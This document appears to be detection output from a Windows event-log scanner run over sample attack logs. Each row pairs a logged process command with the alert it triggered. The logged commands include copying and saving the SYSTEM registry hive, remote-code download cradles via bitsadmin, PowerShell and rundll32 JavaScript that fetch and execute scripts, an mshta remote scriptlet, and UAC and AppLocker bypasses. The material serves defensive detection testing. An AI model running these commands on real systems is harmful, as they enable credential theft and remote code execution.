+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch 
-p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 
+09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 
0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" 
""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp 
Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 
+09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.318 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 
06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe 
javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 
06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: 
